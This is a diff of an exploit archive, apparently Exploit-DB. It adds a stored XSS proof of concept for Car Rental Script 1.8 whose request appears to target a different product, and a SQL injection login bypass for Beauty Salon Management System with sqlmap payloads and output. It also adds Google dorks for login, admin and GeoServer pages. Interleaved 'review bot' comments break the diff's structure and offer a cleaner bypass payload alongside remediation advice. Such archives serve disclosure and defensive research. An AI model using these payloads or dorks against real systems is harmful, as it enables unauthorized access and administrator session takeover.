diff --git a/exploits/php/webapps/51567.txt b/exploits/php/webapps/51567.txt
new file mode 100644
index 000000000..d900619c7
--- /dev/null
+++ b/exploits/php/webapps/51567.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
+# Date: 30/07/2023
+# Exploit Author: CraCkEr
+# Vendor: GZ Scripts
+# Vendor Homepage: https://gzscripts.com/
+# Software Link: https://gzscripts.com/car-rental-php-script.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+Release Notes:
+
+Allow Attacker to inject malicious code into website, give ability to steal sensitive
+information, manipulate data, and launch additional attacks.
+
+## Stored XSS
+-----------------------------------------------
+POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1
+
+payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
+-----------------------------------------------
+
+POST parameter 'first_name' is vulnerable to XSS
+POST parameter 'second_name' is vulnerable to XSS
+POST parameter 'phone' is vulnerable to XSS
+POST parameter 'address_1' is vulnerable to XSS
+POST parameter 'country' is vulnerable to XSS
+
+
+## Steps to Reproduce:
+
+1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car
+2. Inject your [XSS Payload] in "First Name"
+3. Inject your [XSS Payload] in "Last Name"
+4. Inject your [XSS Payload] in "Phone"
+5. Inject your [XSS Payload] in "Address Line 1"
+6. Inject your [XSS Payload] in "Country"
+7. Accept with terms & Press [Booking]
+XSS Fired on Local User Browser.
+8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
+XSS Will Fire and Executed on his Browser
+9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
+XSS Will Fire and Executed on his Browser
\ No newline at end of file
diff --git a/exploits/php/webapps/51568.txt b/exploits/php/webapps/51568.txt
new file mode 100644
index 000000000..479928796
--- /dev/null
+++ b/exploits/php/webapps/51568.txt
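Review bot: The PoC request does not match the product named in the header: it posts to `/EventBookingCalendar/load.php?controller=GzFront&action=checkout` with `event_id`, `event_prices[]` and `payment_method` parameters, which look like GZ Scripts' event-booking product rather than the car-rental checkout that steps 1–7 describe (pickup/return location, rental age), so the request should be re-captured against Car Rental Script 1.8 or the mismatch explained. The placeholders are also unbalanced (`second_name=[XSS Payload&phone=[XSS Payload&…`), `captcha=qqxshj` is a one-time value a reader has to refresh, and `# Date: 30/07/2023` postdates the 2023-07-04 publication date, presumably a typo. The `# Impact` line understates the finding: the payload fires in the admin Dashboard and Bookings views, so an unauthenticated guest gets script execution in an administrator's session, which is the usual route to admin account takeover; I'd change it to `# Impact: Stored XSS executing in the administrator's browser (admin session compromise)`. The remediation worth noting is context-aware output encoding (e.g. `htmlspecialchars($v, ENT_QUOTES, 'UTF-8')`) wherever booking fields are rendered in the admin templates, plus server-side validation of phone and country against an allow-list.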
@@ -0,0 +1,75 @@
+# Exploit Title: Beauty Salon Management System v1.0 - SQLi
+# Date of found: 04/07/2023
+# Exploit Author: Fatih Nacar
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://www.campcodes.com
+# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
+# CWE: CWE-89
+
+Vulnerability Description -
+
+Beauty Salon Management System: V1.0, developed by Campcodes, has been
+found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
+allows an attacker to manipulate login authentication with the SQL queries
+and bypass authentication. The system fails to properly validate
+user-supplied input in the username and password fields during the login
+process, enabling an attacker to inject malicious SQL code. By exploiting
+this vulnerability, an attacker can bypass authentication and gain
+unauthorized access to the system.
+
+Steps to Reproduce -
+
+The following steps outline the exploitation of the SQL Injection
+vulnerability in Beauty Salon Management System V1.0:
+
+1. Open the admin login page by accessing the URL:
+http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
+
+2. In the username and password fields, insert the following SQL Injection
+payload shown inside brackets to bypass authentication for usename
+parameter:
+
+{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In}
+
+3.Execute the SQL Injection payload.
+
+As a result of successful exploitation, the attacker gains unauthorized
+access to the system and is logged in with administrative privileges.
+
+Sqlmap results:
+
+POST parameter 'username' is vulnerable. Do you want to keep testing the
+others (if any)? [y/N] y
+
+sqlmap identified the following injection point(s) with a total of 793
+HTTP(s) requests:
+
+---
+
+Parameter: username (POST)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+
+Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
+ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
+In
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
+rvYF&password=test&login=Sign In
+
+---
+
+[15:58:56] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 8.2.4, Apache 2.4.56
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9abcb8f4d..bdcc933bb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
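Review bot: The payload in step 2 is sqlmap's boolean-based detection string rather than a minimal bypass, and it is wrapped mid-parameter (`login=Sign` / `In`), so a copy-paste submits a broken request; the actual mechanism is that the `-- ` tail (a MySQL comment, which needs the trailing space that `-- vqBh` supplies) truncates the password comparison, so `username=admin'-- -` with any password states the bypass more plainly, it presupposes a row named `admin`, and it means `password=test` is never evaluated. The description claims both the username and password fields are unvalidated, but the sqlmap output lists only `username (POST)` as an injection point, so the password claim should be dropped or demonstrated with its own payload. The write-up would be more useful with the vulnerable query or file (presumably the login handler behind `admin/index.php`, which is not shown) and a remediation line such as `Fix: use a prepared statement with bound parameters for the login query and verify the password with password_verify(), never by comparing it inside the SQL.`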
@@ -14628,6 +14628,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
+51568,exploits/php/webapps/51568.txt,"Beauty Salon Management System v1.0 - SQLi",2023-07-04,"Fatih Nacar",webapps,php,,2023-07-04,2023-07-04,0,,,,,,
 51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
 17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
@@ -15119,7 +15120,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69
 12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
-51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,,
 50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
@@ -15301,6 +15302,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
 49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
+51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
 43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
 41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",webapps,php,,2017-03-13,2017-03-13,0,,,,,,
 26878,exploits/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4381;OSVDB-21834,,,,,https://www.securityfocus.com/bid/15939/info
@@ -24310,7 +24312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
-51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-07-04,1,CVE-2022-3142,,,,,
 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
diff --git a/ghdb.xml b/ghdb.xml
index c2fc77d8f..d57eb8014 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37217,6 +37217,37 @@ Google+ https://plus.google.com/u/0/114827336297709201563 2021-09-27 Bon Sai + + 8210 + https://www.exploit-db.com/ghdb/8210 + Files Containing Juicy Info + Google dorks + # Google Dork: intext:"/login.php" intitle:"login" +# Files Containing Juicy Info +# Date: 04/06/2023 +# Exploit Author: Avadhesh Nishad + + + + + +Avadhesh Nishad + +( WEB APPLICATION SECURITY RESEARCHERS ) + + +*POC Images Attached with this mail.* + + +[image: Screenshot (4).png] +[image: Screenshot (5).png] + + Google dorks + https://www.google.com/search?q=Google dorks + + 2023-07-04 + Avadhesh Nishad + 7836 https://www.exploit-db.com/ghdb/7836 @@ -90751,6 +90782,21 @@ site:".atlassian.net" / "service desk/customer/user/login"2021-09-14 Madan Kumawat + + 8215 + https://www.exploit-db.com/ghdb/8215 + Pages Containing Login Portals + site:.com inurl:/login.aspx + # Google Dork: site:.com inurl:/login.aspx +# Pages Containing Login Portals +# Date: 04/07/2023 +# Exploit Author: Sachin Gupta + site:.com inurl:/login.aspx + https://www.google.com/search?q=site:.com inurl:/login.aspx + + 2023-07-04 + Sachin Gupta + 7704 https://www.exploit-db.com/ghdb/7704 @@ -90843,6 +90889,36 @@ Zeel Chavda 2015-07-27 anonymous + + 8213 + https://www.exploit-db.com/ghdb/8213 + Pages Containing Login Portals + site:.org inurl:/admin.aspx + # Google Dork: site:.org inurl:/admin.aspx +# Pages Containing Login Portals +# Date: 04/07/2023 +# Exploit Author: Sachin Gupta + site:.org inurl:/admin.aspx + https://www.google.com/search?q=site:.org inurl:/admin.aspx + + 2023-07-04 + Sachin Gupta + + + 8214 + https://www.exploit-db.com/ghdb/8214 + Pages Containing Login Portals + site:.org inurl:/login.aspx + # Google Dork: site:.org inurl:/login.aspx +# Pages Containing Login Portals +# Date: 04/07/2023 +# Exploit Author: Sachin Gupta + site:.org inurl:/login.aspx + https://www.google.com/search?q=site:.org inurl:/login.aspx + + 2023-07-04 + Sachin Gupta + 5368 https://www.exploit-db.com/ghdb/5368 
@@ -91112,6 +91188,36 @@ Iranian cyber sec researcher 2020-12-01 Reza Abasi + + 8212 + https://www.exploit-db.com/ghdb/8212 + Pages Containing Login Portals + site:co.in inurl:/admin.aspx + # Google Dork: site:co.in inurl:/admin.aspx +# Pages Containing Login Portals +# Date: 04/07/2023 +# Exploit Author: Sachin Gupta + site:co.in inurl:/admin.aspx + https://www.google.com/search?q=site:co.in inurl:/admin.aspx + + 2023-07-04 + Sachin Gupta + + + 8211 + https://www.exploit-db.com/ghdb/8211 + Pages Containing Login Portals + site:co.in inurl:/login.aspx + # Google Dork: site:co.in inurl:/login.aspx +# Pages Containing Login Portals +# Date: 04/07/2023 +# Exploit Author: Sachin Gupta + site:co.in inurl:/login.aspx + https://www.google.com/search?q=site:co.in inurl:/login.aspx + + 2023-07-04 + Sachin Gupta + 6444 https://www.exploit-db.com/ghdb/6444 @@ -114202,6 +114308,21 @@ https://www.exploit-db.com/exploits/50021 2021-06-25 Alexandros Pappas + + 8216 + https://www.exploit-db.com/ghdb/8216 + Vulnerable Servers + inurl:"/geoserver/ows?service=wfs" + # Google Dork: inurl:"/geoserver/ows?service=wfs" +# Vulnerable Servers +# Date: 04/07/2023 +# Author: Bipin Jitiya + inurl:"/geoserver/ows?service=wfs" + https://www.google.com/search?q=inurl:"/geoserver/ows?service=wfs" + + 2023-07-04 + Bipin Jitiya + 833 https://www.exploit-db.com/ghdb/833